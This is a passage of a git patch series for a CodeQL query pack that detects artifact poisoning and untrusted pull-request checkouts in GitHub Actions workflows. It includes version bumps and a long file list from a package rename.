|| process.env["GITHUB_WORKSPACE"] || "./"; - source_root = path.join(source_root, "**", "*.yml"); await runCommand(codeql, [ "database", From 1fdf76ac4116b6089f17c88a16ddbe2b7bd9bce5 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 17 Jun 2024 15:17:46 +0200 Subject: [PATCH 339/707] Improve download artifact and untrusted checkout queries --- .../security/ArtifactPoisoningQuery.qll | 32 +++++++++++++------ .../security/UntrustedCheckoutQuery.qll | 19 +++++------ 2 files changed, 33 insertions(+), 18 deletions(-) diff --git a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll index 060471bb5dce..44c3c64a5a69 100644 --- a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll 
@@ -16,19 +16,33 @@ abstract class UntrustedArtifactDownloadStep extends Step { abstract string getPath(); } +class GitHubDownloadArtifactActionStep extends UntrustedArtifactDownloadStep, UsesStep { + GitHubDownloadArtifactActionStep() { + // By default, the permissions are scoped so they can only download Artifacts within the current workflow run. + // To elevate permissions for this scenario, you can specify a github-token along with other repository and run identifiers + this.getCallee() = "actions/download-artifact" and + this.getArgument("run-id").matches("%github.event.workflow_run.id%") and + exists(this.getArgument("github-token")) + } + + override string getPath() { + if exists(this.getArgument("path")) then result = this.getArgument("path") else result = "" + } +} + class DownloadArtifactActionStep extends UntrustedArtifactDownloadStep, UsesStep { DownloadArtifactActionStep() { this.getCallee() = [ - "actions/download-artifact", "dawidd6/action-download-artifact", - "marcofaggian/action-download-multiple-artifacts", "benday-inc/download-latest-artifact", - "blablacar/action-download-last-artifact", "levonet/action-download-last-artifact", - "bettermarks/action-artifact-download", "aochmann/actions-download-artifact", - "cytopia/download-artifact-retry-action", "alextompkins/download-prior-artifact", - "nmerget/download-gzip-artifact", "benday-inc/download-artifact", - "synergy-au/download-workflow-artifacts-action", "ishworkh/docker-image-artifact-download", - "ishworkh/container-image-artifact-download", "sidx1024/action-download-artifact", - "hyperskill/azblob-download-artifact", "ma-ve/action-download-artifact-with-retry" + "dawidd6/action-download-artifact", "marcofaggian/action-download-multiple-artifacts", + "benday-inc/download-latest-artifact", "blablacar/action-download-last-artifact", + "levonet/action-download-last-artifact", "bettermarks/action-artifact-download", + "aochmann/actions-download-artifact", 
"cytopia/download-artifact-retry-action", + "alextompkins/download-prior-artifact", "nmerget/download-gzip-artifact", + "benday-inc/download-artifact", "synergy-au/download-workflow-artifacts-action", + "ishworkh/docker-image-artifact-download", "ishworkh/container-image-artifact-download", + "sidx1024/action-download-artifact", "hyperskill/azblob-download-artifact", + "ma-ve/action-download-artifact-with-retry" ] and ( not exists(this.getArgument(["branch", "branch_name"])) or diff --git a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll index ba31b0de500a..a9c92e70ee5e 100644 --- a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll +++ b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll @@ -93,7 +93,11 @@ class ActionsMutableRefCheckout extends MutableRefCheckoutStep instanceof UsesSt // 3rd party actions returning the PR head sha/ref exists(UsesStep step | ( - step.getCallee() = ["eficode/resolve-pr-refs", "xt0rted/pull-request-comment-branch"] and + step.getCallee() = + [ + "eficode/resolve-pr-refs", "xt0rted/pull-request-comment-branch", + "alessbell/pull-request-comment-branch", "gotson/pull-request-comment-branch" + ] and // TODO: This should be read step of the head_sha or head_ref output vars this.getArgument("ref").matches("%.head_ref%") or @@ -229,10 +233,10 @@ class GhSHACheckout extends SHACheckoutStep instanceof Run { /** An If node that contains an actor, user or label check */ abstract class ControlCheck extends If { predicate dominates(Step step) { - step.getIf() = this or + step.getIf() = this or step.getEnclosingJob().getIf() = this or - step.getEnclosingJob().getANeededJob().(LocalJob).getAStep().getIf() = this or - step.getEnclosingJob().getANeededJob().(LocalJob).getIf() = this + step.getEnclosingJob().getANeededJob().(LocalJob).getAStep().getIf() = this or + step.getEnclosingJob().getANeededJob().(LocalJob).getIf() = this } } 
@@ -259,7 +263,7 @@ class ActorControlCheck extends ControlCheck { .regexpFind([ "\\bgithub\\.actor\\b", "\\bgithub\\.triggering_actor\\b", "\\bgithub\\.event\\.comment\\.user\\.login\\b", - "\\bgithub\\.event\\.pull_request\\.user\\.login\\b", + "\\bgithub\\.event\\.pull_request\\.user\\.login\\b", ], _, _) ) } @@ -270,10 +274,7 @@ class RepositoryControlCheck extends ControlCheck { // eg: github.repository == 'test/foo' exists( normalizeExpr(this.getCondition()) - .regexpFind([ - "\\bgithub\\.repository\\b", - "\\bgithub\\.repository_owner\\b", - ], _, _) + .regexpFind(["\\bgithub\\.repository\\b", "\\bgithub\\.repository_owner\\b",], _, _) ) } } From c764b39c1842b433d043bb9c2b974e8abe46861a Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 17 Jun 2024 17:11:10 +0200 Subject: [PATCH 340/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 33c43429bd62..10d9eeddcf71 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.1.1 +version: 0.1.2 dependencies: codeql/util: ^1.0.0 codeql/yaml: ^1.0.0 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 75624d6f1995..16bad7c15bd3 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries -version: 0.1.1 +version: 0.1.2 groups: [actions, queries] suites: codeql-suites extractor: javascript From 4619128c11ea18a55b04d9583e80fa16f2d6c66a Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 20 Jun 2024 09:50:36 +0200 Subject: [PATCH 341/707] Move from githubsecuritylab packages to github --- .github/action/dist/index.js | 2 +- .github/action/src/codeql.ts | 2 +- ql/lib/ext/8398a7_action-slack.model.yml | 2 +- ql/lib/ext/SonarSource_sonarcloud-github-action.model.yml | 2 +- ql/lib/ext/actions_github-script.model.yml | 2 +- ql/lib/ext/ahmadnassri_action-changed-files.model.yml | 2 +- ql/lib/ext/akhileshns_heroku-deploy.model.yml | 4 ++-- ql/lib/ext/amannn_action-semantic-pull-request.model.yml | 2 +- ql/lib/ext/anchore_sbom-action.model.yml | 2 +- ql/lib/ext/anchore_scan-action.model.yml | 2 +- ql/lib/ext/andresz1_size-limit-action.model.yml | 2 +- ql/lib/ext/android-actions_setup-android.model.yml | 2 +- ql/lib/ext/apple-actions_import-codesign-certs.model.yml | 2 +- ql/lib/ext/asdf-vm_actions.model.yml | 2 +- .../ext/ashley-taylor_read-json-property-action.model.yml | 2 +- ql/lib/ext/ashley-taylor_regex-property-action.model.yml | 2 +- ql/lib/ext/aszc_change-string-case-action.model.yml | 2 +- .../ext/aws-actions_configure-aws-credentials.model.yml | 2 +- ql/lib/ext/axel-op_googlejavaformat-action.model.yml | 2 +- ql/lib/ext/azure_powershell.model.yml | 2 +- ql/lib/ext/bahmutov_npm-install.model.yml | 2 +- ql/lib/ext/blackducksoftware_github-action.model.yml | 2 +- ql/lib/ext/bobheadxi_deployments.model.yml | 2 +- ql/lib/ext/bufbuild_buf-breaking-action.model.yml | 4 ++-- ql/lib/ext/bufbuild_buf-lint-action.model.yml | 4 ++-- ql/lib/ext/bufbuild_buf-setup-action.model.yml | 2 +- ql/lib/ext/cachix_cachix-action.model.yml | 4 ++-- ql/lib/ext/changesets_action.model.yml | 2 +- ql/lib/ext/cloudflare_wrangler-action.model.yml | 2 +- ql/lib/ext/coursier_cache-action.model.yml | 2 +- ql/lib/ext/crazy-max_ghaction-chocolatey.model.yml | 2 +- ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml | 2 +- ql/lib/ext/csexton_release-asset-action.model.yml | 2 +- ql/lib/ext/cycjimmy_semantic-release-action.model.yml | 2 
+- ql/lib/ext/cypress-io_github-action.model.yml | 2 +- ql/lib/ext/dailydotdev_action-devcard.model.yml | 2 +- .../danielpalme_reportgenerator-github-action.model.yml | 2 +- ql/lib/ext/daspn_private-actions-checkout.model.yml | 2 +- ql/lib/ext/dawidd6_action-ansible-playbook.model.yml | 2 +- ql/lib/ext/dawidd6_action-download-artifact.model.yml | 2 +- ql/lib/ext/delaguardo_setup-clojure.model.yml | 2 +- .../determinatesystems_magic-nix-cache-action.model.yml | 2 +- ql/lib/ext/docker-practice_actions-setup-docker.model.yml | 2 +- ql/lib/ext/docker_build-push-action.model.yml | 2 +- ql/lib/ext/endbug_latest-tag.model.yml | 2 +- ql/lib/ext/expo_expo-github-action.model.yml | 2 +- .../ext/firebaseextended_action-hosting-deploy.model.yml | 2 +- ql/lib/ext/frabert_replace-string-action.model.yml | 2 +- ql/lib/ext/franzdiebold_github-env-vars-action.model.yml | 2 +- ql/lib/ext/gabrielbb_xvfb-action.model.yml | 2 +- ql/lib/ext/game-ci_unity-builder.model.yml | 2 +- ql/lib/ext/game-ci_unity-test-runner.model.yml | 2 +- ql/lib/ext/gautamkrishnar_blog-post-workflow.model.yml | 2 +- .../actions_actions-runner-controller.model.yml | 2 +- .../ext/generated/composite-actions/adap_flower.model.yml | 2 +- .../composite-actions/agoric_agoric-sdk.model.yml | 2 +- .../composite-actions/airbnb_lottie-ios.model.yml | 2 +- .../composite-actions/airbytehq_airbyte.model.yml | 2 +- .../composite-actions/amazon-ion_ion-java.model.yml | 2 +- .../generated/composite-actions/anchore_grype.model.yml | 2 +- .../generated/composite-actions/anchore_syft.model.yml | 2 +- .../composite-actions/angular_dev-infra.model.yml | 2 +- .../composite-actions/ansible_ansible-lint.model.yml | 2 +- .../ext/generated/composite-actions/ansible_awx.model.yml | 2 +- .../composite-actions/apache_arrow-datafusion.model.yml | 2 +- .../generated/composite-actions/apache_arrow-rs.model.yml | 2 +- .../generated/composite-actions/apache_arrow.model.yml | 2 +- .../composite-actions/apache_bookkeeper.model.yml | 2 +- 
.../ext/generated/composite-actions/apache_brpc.model.yml | 2 +- .../generated/composite-actions/apache_camel-k.model.yml | 2 +- .../generated/composite-actions/apache_camel.model.yml | 2 +- .../generated/composite-actions/apache_flink.model.yml | 2 +- .../apache_incubator-kie-tools.model.yml | 2 +- .../generated/composite-actions/apache_nuttx.model.yml | 2 +- .../generated/composite-actions/apache_opendal.model.yml | 2 +- .../generated/composite-actions/apache_pekko.model.yml | 2 +- .../composite-actions/apache_pulsar-helm-chart.model.yml | 2 +- .../generated/composite-actions/apache_superset.model.yml | 2 +- .../composite-actions/appflowy-io_appflowy.model.yml | 2 +- .../composite-actions/aptos-labs_aptos-core.model.yml | 2 +- .../archivesspace_archivesspace.model.yml | 2 +- .../composite-actions/armadaproject_armada.model.yml | 2 +- .../generated/composite-actions/armbian_build.model.yml | 2 +- .../composite-actions/auth0_auth0-java.model.yml | 2 +- .../generated/composite-actions/auth0_auth0.net.model.yml | 2 +- .../composite-actions/auth0_auth0.swift.model.yml | 2 +- .../composite-actions/autogluon_autogluon.model.yml | 2 +- .../generated/composite-actions/avaiga_taipy.model.yml | 2 +- .../composite-actions/aws-amplify_amplify-cli.model.yml | 2 +- .../aws-powertools_powertools-lambda-python.model.yml | 2 +- .../composite-actions/aws_amazon-vpc-cni-k8s.model.yml | 2 +- .../aws_karpenter-provider-aws.model.yml | 2 +- .../composite-actions/awslabs_amazon-eks-ami.model.yml | 2 +- .../awslabs_aws-lambda-rust-runtime.model.yml | 2 +- .../azerothcore_azerothcore-wotlk.model.yml | 2 +- .../composite-actions/azure_azure-datafactory.model.yml | 2 +- .../generated/composite-actions/badges_shields.model.yml | 2 +- .../composite-actions/balena-io_etcher.model.yml | 2 +- .../composite-actions/balena-os_balena-engine.model.yml | 2 +- .../composite-actions/ben-manes_caffeine.model.yml | 2 +- .../ext/generated/composite-actions/bokeh_bokeh.model.yml | 2 +- 
.../composite-actions/botpress_botpress.model.yml | 2 +- .../braintree_braintree-android-drop-in.model.yml | 2 +- .../braintree_braintree_android.model.yml | 2 +- .../composite-actions/broadinstitute_gatk.model.yml | 2 +- .../composite-actions/canonical_multipass.model.yml | 2 +- .../composite-actions/chia-network_actions.model.yml | 2 +- .../chia-network_chia-blockchain.model.yml | 2 +- .../composite-actions/chipsalliance_chisel.model.yml | 2 +- .../composite-actions/chocobozzz_peertube.model.yml | 2 +- .../composite-actions/cilium_cilium-cli.model.yml | 2 +- .../generated/composite-actions/cilium_cilium.model.yml | 2 +- .../generated/composite-actions/citusdata_citus.model.yml | 2 +- .../composite-actions/clerk_javascript.model.yml | 2 +- .../cloud-custodian_cloud-custodian.model.yml | 2 +- .../composite-actions/cloudflare_workers-sdk.model.yml | 2 +- .../cloudfoundry_cloud_controller_ng.model.yml | 2 +- .../ext/generated/composite-actions/coder_coder.model.yml | 2 +- .../generated/composite-actions/coil-kt_coil.model.yml | 2 +- .../composite-actions/commaai_openpilot.model.yml | 2 +- .../conan-io_conan-center-index.model.yml | 2 +- .../composite-actions/corretto_corretto-8.model.yml | 2 +- .../composite-actions/cosmos_cosmos-sdk.model.yml | 2 +- .../generated/composite-actions/coturn_coturn.model.yml | 2 +- .../crunchydata_postgres-operator.model.yml | 2 +- .../ext/generated/composite-actions/cvc5_cvc5.model.yml | 2 +- .../generated/composite-actions/d2l-ai_d2l-en.model.yml | 2 +- .../danysk_build-check-deploy-gradle-action.model.yml | 2 +- .../composite-actions/datadog_dd-trace-dotnet.model.yml | 2 +- .../composite-actions/datadog_dd-trace-go.model.yml | 2 +- .../composite-actions/datadog_dd-trace-js.model.yml | 2 +- .../composite-actions/datafuselabs_databend.model.yml | 2 +- .../generated/composite-actions/davatorium_rofi.model.yml | 2 +- .../composite-actions/debezium_debezium.model.yml | 2 +- .../composite-actions/defenseunicorns_zarf.model.yml | 2 +- 
...marches-simplifiees_demarches-simplifiees.fr.model.yml | 2 +- .../department-of-veterans-affairs_vets-website.model.yml | 2 +- .../composite-actions/devexpress_devextreme.model.yml | 2 +- .../generated/composite-actions/diggerhq_digger.model.yml | 2 +- .../generated/composite-actions/diku-dk_futhark.model.yml | 2 +- .../composite-actions/discourse_.github.model.yml | 2 +- .../generated/composite-actions/dnsjava_dnsjava.model.yml | 2 +- .../dotintent_react-native-ble-plx.model.yml | 2 +- .../composite-actions/dotnet_docs-tools.model.yml | 2 +- .../composite-actions/dotnet_dotnet-monitor.model.yml | 2 +- .../composite-actions/dragonflydb_dragonfly.model.yml | 2 +- .../composite-actions/drawpile_drawpile.model.yml | 2 +- .../composite-actions/eksctl-io_eksctl.model.yml | 2 +- .../composite-actions/elastic_apm-agent-dotnet.model.yml | 2 +- .../composite-actions/elastic_apm-agent-java.model.yml | 2 +- .../composite-actions/elastic_apm-server.model copy.yml | 2 +- .../composite-actions/elementor_elementor.model.yml | 2 +- .../generated/composite-actions/emberjs_data.model.yml | 2 +- .../ext/generated/composite-actions/emqx_emqx.model.yml | 2 +- .../composite-actions/eonasdan_tempus-dominus.model.yml | 2 +- .../ext/generated/composite-actions/erlang_otp.model.yml | 2 +- .../generated/composite-actions/esphome_esphome.model.yml | 2 +- .../generated/composite-actions/expensify_app.model.yml | 2 +- .../ext/generated/composite-actions/expo_expo.model.yml | 2 +- .../composite-actions/expo_vscode-expo.model.yml | 2 +- .../external-secrets_external-secrets.model.yml | 2 +- .../generated/composite-actions/facebook_buck2.model.yml | 2 +- .../generated/composite-actions/facebook_flow.model.yml | 2 +- .../generated/composite-actions/facebook_yoga.model.yml | 2 +- .../composite-actions/facebookresearch_xformers.model.yml | 2 +- .../composite-actions/fastly_compute-actions.model.yml | 2 +- .../generated/composite-actions/felangel_bloc.model.yml | 2 +- 
.../composite-actions/firebase_firebase-ios-sdk.model.yml | 2 +- .../composite-actions/flagsmith_flagsmith.model.yml | 2 +- .../composite-actions/flaxengine_flaxengine.model.yml | 2 +- .../flipperdevices_flipperzero-firmware.model.yml | 2 +- .../generated/composite-actions/fluxcd_flux2.model.yml | 2 +- .../forcedotcom_salesforcedx-vscode.model.yml | 2 +- .../generated/composite-actions/fossasia_visdom.model.yml | 2 +- .../composite-actions/freckle_stack-action.model.yml | 2 +- .../freeradius_freeradius-server.model.yml | 2 +- .../generated/composite-actions/gaphor_gaphor.model.yml | 2 +- .../composite-actions/getsentry_action-release.model.yml | 2 +- .../composite-actions/github_codeql-action.model.yml | 2 +- .../ext/generated/composite-actions/github_ruby.model.yml | 2 +- .../composite-actions/gittools_gitversion.model.yml | 2 +- .../composite-actions/go-spatial_tegola.model.yml | 2 +- .../composite-actions/goauthentik_authentik.model.yml | 2 +- .../composite-actions/godotengine_godot.model.yml | 2 +- .../generated/composite-actions/google_dagger.model.yml | 2 +- .../composite-actions/googleapis_java-cloud-bom.model.yml | 2 +- .../googleapis_sdk-platform-java.model.yml | 2 +- .../googlecloudplatform_dataflowtemplates.model.yml | 4 ++-- .../googlecloudplatform_magic-modules.model.yml | 2 +- .../composite-actions/gravitational_teleport.model.yml | 2 +- .../composite-actions/grote_transportr.model.yml | 2 +- .../generated/composite-actions/hashicorp_nomad.model.yml | 2 +- .../composite-actions/hashicorp_terraform.model.yml | 2 +- .../generated/composite-actions/hashicorp_vault.model.yml | 4 ++-- .../composite-actions/home-assistant_android.model.yml | 2 +- .../composite-actions/homebrew_actions.model.yml | 2 +- .../hyperledger_aries-cloudagent-python.model.yml | 2 +- .../hyperledger_fabric-samples.model.yml | 2 +- .../composite-actions/igniterealtime_openfire.model.yml | 2 +- .../composite-actions/infracost_actions.model.yml | 2 +- 
.../inspektor-gadget_inspektor-gadget.model.yml | 2 +- .../composite-actions/intel-analytics_ipex-llm.model.yml | 2 +- .../ionic-team_ionic-framework.model.yml | 2 +- .../composite-actions/ionic-team_ionicons.model.yml | 2 +- .../composite-actions/ionic-team_stencil.model.yml | 2 +- .../ext/generated/composite-actions/ipfs_aegir.model.yml | 2 +- .../jetbrains_jetbrainsruntime.model.yml | 2 +- .../jhipster_generator-jhipster.model.yml | 4 ++-- .../composite-actions/jsocol_django-ratelimit.model.yml | 2 +- .../composite-actions/juicedata_juicefs.model.yml | 2 +- .../composite-actions/jupyter_docker-stacks.model.yml | 2 +- .../composite-actions/keycloak_keycloak.model.yml | 2 +- .../generated/composite-actions/kserve_kserve.model.yml | 2 +- .../generated/composite-actions/kubeflow_katib.model.yml | 2 +- .../kubeflow_training-operator.model.yml | 2 +- .../composite-actions/kubernetes-sigs_karpenter.model.yml | 2 +- .../composite-actions/kubernetes-sigs_kwok.model.yml | 2 +- .../composite-actions/kubescape_kubescape.model.yml | 2 +- .../composite-actions/kubeshop_botkube.model.yml | 2 +- .../generated/composite-actions/kyverno_kyverno.model.yml | 2 +- .../generated/composite-actions/lancedb_lance.model.yml | 2 +- .../launchdarkly_ios-client-sdk.model.yml | 2 +- .../layer5labs_meshmap-snapshot.model.yml | 2 +- .../composite-actions/ldc-developers_ldc.model.yml | 2 +- .../composite-actions/ledgerhq_ledger-live.model.yml | 2 +- .../ext/generated/composite-actions/lerna_lerna.model.yml | 2 +- .../ext/generated/composite-actions/lf-edge_eve.model.yml | 2 +- .../generated/composite-actions/libgit2_libgit2.model.yml | 2 +- .../lightning-ai_pytorch-lightning.model.yml | 2 +- .../composite-actions/lightning-ai_torchmetrics.model.yml | 2 +- .../composite-actions/linkerd_linkerd2.model.yml | 4 ++-- .../composite-actions/logseq_publish-spa.model.yml | 2 +- .../composite-actions/macvim-dev_macvim.model.yml | 2 +- .../generated/composite-actions/mamba-org_mamba.model.yml | 2 +- 
.../composite-actions/maplibre_maplibre-native.model.yml | 2 +- .../composite-actions/mastodon_mastodon.model.yml | 2 +- .../composite-actions/mavlink_qgroundcontrol.model.yml | 2 +- .../composite-actions/mdanalysis_mdanalysis.model.yml | 2 +- .../generated/composite-actions/medic_cht-core.model.yml | 2 +- .../generated/composite-actions/medusajs_medusa.model.yml | 2 +- .../composite-actions/metabase_metabase.model.yml | 2 +- .../metamask_action-create-release-pr.model.yml | 2 +- .../metamask_action-npm-publish.model.yml | 2 +- .../composite-actions/microsoft_fluentui.model.yml | 2 +- .../composite-actions/microsoft_playwright.model.yml | 2 +- .../generated/composite-actions/microsoft_wsl.model.yml | 2 +- .../composite-actions/milvus-io_milvus.model.yml | 2 +- .../generated/composite-actions/mlflow_mlflow.model.yml | 2 +- .../composite-actions/modin-project_modin.model.yml | 2 +- .../composite-actions/mozilla_addons-server.model.yml | 2 +- .../generated/composite-actions/mozilla_bedrock.model.yml | 2 +- .../generated/composite-actions/mozilla_sccache.model.yml | 2 +- .../composite-actions/msys2_setup-msys2.model.yml | 2 +- .../composite-actions/mumble-voip_mumble.model.yml | 2 +- .../ext/generated/composite-actions/nasa_fprime.model.yml | 2 +- .../composite-actions/nats-io_nats-server.model.yml | 2 +- ...form-actions_optic-release-automation-action.model.yml | 2 +- .../ext/generated/composite-actions/nektos_act.model.yml | 2 +- .../neo4j-contrib_neo4j-apoc-procedures.model.yml | 2 +- .../composite-actions/neondatabase_neon.model.yml | 2 +- .../generated/composite-actions/neovim_neovim.model.yml | 2 +- .../ext/generated/composite-actions/nhost_nhost.model.yml | 2 +- .../composite-actions/nix-community_nixos-wsl.model.yml | 2 +- .../ext/generated/composite-actions/novuhq_novu.model.yml | 4 ++-- .../ext/generated/composite-actions/nymtech_nym.model.yml | 2 +- .../composite-actions/obsproject_obs-studio.model.yml | 2 +- 
.../ext/generated/composite-actions/ocaml_dune.model.yml | 2 +- .../composite-actions/oneflow-inc_oneflow.model.yml | 2 +- .../open-telemetry_opentelemetry-ruby-contrib.model.yml | 2 +- .../open-telemetry_opentelemetry-ruby.model.yml | 2 +- .../open-watcom_open-watcom-v2.model.yml | 2 +- .../openapitools_openapi-generator.model.yml | 2 +- .../ext/generated/composite-actions/openjdk_jdk.model.yml | 2 +- .../opensearch-project_opensearch-net.model.yml | 2 +- .../opensearch-project_security.model.yml | 2 +- .../composite-actions/opentrons_opentrons.model.yml | 2 +- .../composite-actions/openvinotoolkit_openvino.model.yml | 2 +- ...nzeppelin_openzeppelin-contracts-upgradeable.model.yml | 2 +- .../openzeppelin_openzeppelin-contracts.model.yml | 2 +- .../ext/generated/composite-actions/oppia_oppia.model.yml | 2 +- .../generated/composite-actions/oracle_graal.model.yml | 2 +- .../composite-actions/oracle_truffleruby.model.yml | 2 +- .../generated/composite-actions/orhun_git-cliff.model.yml | 2 +- .../ext/generated/composite-actions/oven-sh_bun.model.yml | 2 +- .../composite-actions/owntracks_android.model.yml | 2 +- .../composite-actions/pandas-dev_pandas.model.yml | 2 +- .../composite-actions/pardeike_harmony.model.yml | 2 +- .../composite-actions/pennylaneai_pennylane.model.yml | 2 +- .../composite-actions/phalcon_cphalcon.model.yml | 2 +- .../philosowaffle_peloton-to-garmin.model.yml | 4 ++-- .../ext/generated/composite-actions/php_php-src.model.yml | 2 +- .../phpdocumentor_phpdocumentor.model.yml | 2 +- .../pinecone-io_pinecone-python-client.model.yml | 2 +- .../generated/composite-actions/pixijs_pixijs.model.yml | 2 +- .../generated/composite-actions/posthog_posthog.model.yml | 2 +- .../generated/composite-actions/primer_react.model.yml | 2 +- .../project-chip_connectedhomeip.model.yml | 2 +- .../composite-actions/projectnessie_nessie.model.yml | 2 +- .../ext/generated/composite-actions/psf_black.model.yml | 2 +- .../composite-actions/pyca_cryptography.model.yml | 2 
+- .../pyg-team_pytorch_geometric.model.yml | 2 +- .../composite-actions/python-poetry_poetry.model.yml | 2 +- .../ext/generated/composite-actions/python_mypy.model.yml | 2 +- .../composite-actions/quarto-dev_quarto-cli.model.yml | 2 +- .../ext/generated/composite-actions/quay_clair.model.yml | 2 +- .../composite-actions/quickwit-oss_quickwit.model.yml | 2 +- .../generated/composite-actions/r-lib_actions.model.yml | 2 +- .../generated/composite-actions/randombit_botan.model.yml | 2 +- .../composite-actions/raspberrypi_documentation.model.yml | 2 +- .../composite-actions/ray-project_kuberay.model.yml | 2 +- .../composite-actions/readthedocs_actions.model.yml | 2 +- .../composite-actions/reflex-dev_reflex.model.yml | 2 +- .../composite-actions/renovatebot_renovate.model.yml | 2 +- .../composite-actions/rethinkdb_rethinkdb.model.yml | 2 +- .../ext/generated/composite-actions/risc0_risc0.model.yml | 2 +- .../composite-actions/rocketchat_rocket.chat.model.yml | 2 +- .../ext/generated/composite-actions/rook_rook.model.yml | 2 +- .../generated/composite-actions/roots_trellis.model.yml | 2 +- .../ext/generated/composite-actions/ruby_debug.model.yml | 2 +- .../ext/generated/composite-actions/ruby_ruby.model.yml | 2 +- .../generated/composite-actions/rusefi_rusefi.model.yml | 2 +- .../generated/composite-actions/saltstack_salt.model.yml | 2 +- ql/lib/ext/generated/composite-actions/saltstack_salt.yml | 2 +- .../generated/composite-actions/sap_sapmachine.model.yml | 2 +- .../composite-actions/scala-native_scala-native.model.yml | 2 +- .../generated/composite-actions/scitools_iris.model.yml | 2 +- .../composite-actions/scylladb_scylla-operator.model.yml | 2 +- .../composite-actions/shader-slang_slang.model.yml | 2 +- .../shaka-project_shaka-player.model.yml | 2 +- .../shakacode_react-webpack-rails-tutorial.model.yml | 2 +- .../composite-actions/simple-icons_simple-icons.model.yml | 2 +- .../generated/composite-actions/slint-ui_slint.model.yml | 2 +- 
.../composite-actions/solidusio_solidus.model.yml | 2 +- .../generated/composite-actions/solo-io_gloo.model.yml | 2 +- .../generated/composite-actions/sonarr_sonarr.model.yml | 2 +- .../composite-actions/sonic-pi-net_sonic-pi.model.yml | 2 +- .../composite-actions/spacedriveapp_spacedrive.model.yml | 2 +- .../composite-actions/spockframework_spock.model.yml | 2 +- .../composite-actions/spring-io_initializr.model.yml | 2 +- .../composite-actions/spring-io_start.spring.io.model.yml | 2 +- .../spring-projects_spring-boot.model.yml | 2 +- .../spring-projects_spring-framework.model.yml | 2 +- .../spring-projects_spring-graphql.model.yml | 2 +- .../composite-actions/square_workflow-kotlin.model.yml | 2 +- .../composite-actions/stefanprodan_podinfo.model.yml | 2 +- .../ext/generated/composite-actions/stellar_go.model.yml | 2 +- .../composite-actions/streetsidesoftware_cspell.model.yml | 4 ++-- .../generated/composite-actions/subquery_subql.model.yml | 2 +- .../swagger-api_swagger-codegen.model.yml | 2 +- .../swagger-api_swagger-parser.model.yml | 2 +- .../composite-actions/tarantool_tarantool.model.yml | 2 +- .../telepresenceio_telepresence.model.yml | 2 +- .../composite-actions/tensorflow_datasets.model.yml | 2 +- .../composite-actions/texstudio-org_texstudio.model.yml | 2 +- .../composite-actions/toeverything_affine.model.yml | 2 +- .../composite-actions/treeverse_lakefs.model.yml | 2 +- .../composite-actions/trezor_trezor-firmware.model.yml | 2 +- .../generated/composite-actions/tribler_tribler.model.yml | 2 +- .../composite-actions/trunk-io_trunk-action.model.yml | 2 +- .../generated/composite-actions/unidata_metpy.model.yml | 2 +- .../unstructured-io_unstructured.model.yml | 2 +- .../generated/composite-actions/vercel_turbo.model.yml | 2 +- .../composite-actions/vesoft-inc_nebula.model.yml | 2 +- .../ext/generated/composite-actions/vkcom_vkui.model.yml | 2 +- .../composite-actions/vuetifyjs_vuetify.model.yml | 2 +- 
.../generated/composite-actions/wagoodman_dive.model.yml | 2 +- .../walletconnect_walletconnectswiftv2.model.yml | 2 +- .../ext/generated/composite-actions/wazuh_wazuh.model.yml | 2 +- .../composite-actions/web-infra-dev_rspack.model.yml | 2 +- .../composite-actions/webassembly_wabt.model.yml | 2 +- .../ext/generated/composite-actions/wntrblm_nox.model.yml | 2 +- .../generated/composite-actions/xrplf_rippled.model.yml | 2 +- .../ext/generated/composite-actions/zcash_zcash.model.yml | 2 +- .../generated/composite-actions/zenml-io_zenml.model.yml | 2 +- .../generated/composite-actions/zeroc-ice_ice.model.yml | 2 +- .../reusable-workflows/0xpolygon_polygon-edge.model.yml | 2 +- .../ext/generated/reusable-workflows/8vim_8vim.model.yml | 2 +- .../actions_reusable-workflows.model.yml | 2 +- .../generated/reusable-workflows/adap_flower.model.yml | 2 +- .../reusable-workflows/aio-libs_multidict.model.yml | 2 +- .../generated/reusable-workflows/aio-libs_yarl.model.yml | 2 +- .../reusable-workflows/airbytehq_airbyte.model.yml | 2 +- .../reusable-workflows/alphagov_collections.model.yml | 2 +- .../reusable-workflows/alphagov_frontend.model.yml | 2 +- .../reusable-workflows/alphagov_publishing-api.model.yml | 2 +- .../generated/reusable-workflows/apache_druid.model.yml | 2 +- .../generated/reusable-workflows/apache_flink.model.yml | 2 +- .../generated/reusable-workflows/apache_spark.model.yml | 2 +- .../reusable-workflows/argilla-io_argilla.model.yml | 2 +- .../reusable-workflows/argoproj_argo-cd.model.yml | 2 +- .../reusable-workflows/argoproj_argo-rollouts.model.yml | 2 +- .../reusable-workflows/aws-amplify_amplify-ui.model.yml | 2 +- .../generated/reusable-workflows/azure_apiops.model.yml | 2 +- .../reusable-workflows/azure_mlops-templates.model.yml | 2 +- .../reusable-workflows/bbq-beets_avocaddo-cmw.model.yml | 2 +- .../reusable-workflows/bbq-beets_mobile-ci-cd.model.yml | 2 +- .../bbq-beets_yujincat-action.model.yml | 2 +- .../bdunderscore_modular-avatar.model.yml | 2 +- 
